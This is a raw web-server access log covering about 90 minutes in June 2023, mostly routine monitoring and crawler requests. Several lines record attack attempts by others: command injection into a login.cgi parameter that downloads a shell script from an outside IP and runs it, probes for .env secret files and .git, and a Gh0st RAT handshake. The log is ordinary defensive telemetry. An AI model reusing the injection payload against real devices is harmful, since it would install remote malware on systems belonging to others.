212.91.246.72 - - [01/Jun/2023:20:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:20:58:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:20:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:02:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:03:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:04:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.36 - - [01/Jun/2023:21:04:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:05:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:06:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:08:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:09:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.163.146.253 - - [01/Jun/2023:21:10:03 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
109.205.213.107 - - [01/Jun/2023:21:10:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:21:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:11:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.37 - - [01/Jun/2023:21:11:25 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:12:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.205.34 - - [01/Jun/2023:21:12:35 +0200] "Gh0st\xad" 501 321 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.128.232.62 - - [01/Jun/2023:21:13:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:21:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:16:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.33.0.42 - - [01/Jun/2023:21:16:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:21:17:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:18:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.158.56.141 - - [01/Jun/2023:21:18:32 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
18.189.195.122 - - [01/Jun/2023:21:18:38 +0200] "GET /.git/ HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1; U) Opera 7.54 [de]"
18.189.195.122 - - [01/Jun/2023:21:18:38 +0200] "GET /git/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1"
212.91.246.72 - - [01/Jun/2023:21:19:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.233.62.116 - - [01/Jun/2023:21:21:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [01/Jun/2023:21:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.240 - - [01/Jun/2023:21:22:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:22:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.132.113.130 - - [01/Jun/2023:21:22:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:21:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:25:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:27:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:29:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.116.52.89 - - [01/Jun/2023:21:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:21:31:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.96.55 - - [01/Jun/2023:21:31:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
34.76.96.55 - - [01/Jun/2023:21:32:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [01/Jun/2023:21:32:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.241 - - [01/Jun/2023:21:34:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
205.210.31.70 - - [01/Jun/2023:21:35:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.116.52.89 - - [01/Jun/2023:21:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:21:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:37:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:39:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.26.135.81 - - [01/Jun/2023:21:39:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:21:39:44 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:21:39:54 +0200] "GET /sendgrid/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:21:39:54 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:21:40:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:42:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.133 - - [01/Jun/2023:21:43:58 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.79 - - [01/Jun/2023:21:44:06 +0200] "GET /seiten/service.htm HTTP/1.1" 404 335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:21:44:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:45:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:46:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.99.112.68 - - [01/Jun/2023:21:47:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:47:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.116.52.89 - - [01/Jun/2023:21:48:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:21:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.116.52.89 - - [01/Jun/2023:21:48:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
85.99.112.68 - - [01/Jun/2023:21:49:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:49:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.99.112.68 - - [01/Jun/2023:21:49:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.99.112.68 - - [01/Jun/2023:21:50:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
192.109.219.178 - - [01/Jun/2023:21:50:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
85.99.112.68 - - [01/Jun/2023:21:51:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:52:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.99.112.68 - - [01/Jun/2023:21:52:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.99.112.68 - - [01/Jun/2023:21:53:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
85.99.112.68 - - [01/Jun/2023:21:53:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
109.205.213.109 - - [01/Jun/2023:21:54:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:21:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:55:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.99.112.68 - - [01/Jun/2023:21:56:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
85.99.112.68 - - [01/Jun/2023:21:56:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:21:57:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.110.32.156 - - [01/Jun/2023:21:58:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:21:58:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:21:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:01:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:02:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.156.222.41 - - [01/Jun/2023:22:02:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
125.132.113.130 - - [01/Jun/2023:22:02:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.8 - - [01/Jun/2023:22:02:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:22:03:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.43 - - [01/Jun/2023:22:03:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.156.222.41 - - [01/Jun/2023:22:04:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:04:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.41 - - [01/Jun/2023:22:04:23 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.156.222.41 - - [01/Jun/2023:22:04:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:05:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.156.222.41 - - [01/Jun/2023:22:05:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
103.116.52.89 - - [01/Jun/2023:22:06:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.156.222.41 - - [01/Jun/2023:22:06:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:06:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.26.135.81 - - [01/Jun/2023:22:06:46 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:22:06:47 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:22:06:50 +0200] "GET /sendgrid/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [01/Jun/2023:22:06:51 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:22:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.156.222.41 - - [01/Jun/2023:22:07:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:08:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.156.222.41 - - [01/Jun/2023:22:08:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.156.222.41 - - [01/Jun/2023:22:08:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
45.128.232.62 - - [01/Jun/2023:22:08:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Jun/2023:22:09:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:10:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.156.222.41 - - [01/Jun/2023:22:11:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.156.222.41 - - [01/Jun/2023:22:11:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:11:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:12:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.48 - - [01/Jun/2023:22:13:43 +0200] "\x03" 501 316 "-" "-"
51.254.59.113 - - [01/Jun/2023:22:14:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
212.91.246.72 - - [01/Jun/2023:22:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:16:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:17:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:18:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:18:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
109.205.213.106 - - [01/Jun/2023:22:18:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [01/Jun/2023:22:19:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:20:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:20:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
88.100.26.87 - - [01/Jun/2023:22:20:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:21:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:22:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:22:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:23:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:24:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:25:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
88.100.26.87 - - [01/Jun/2023:22:25:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:25:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:27:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.100.26.87 - - [01/Jun/2023:22:27:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
88.100.26.87 - - [01/Jun/2023:22:27:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Jun/2023:22:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:29:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jun/2023:22:31:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
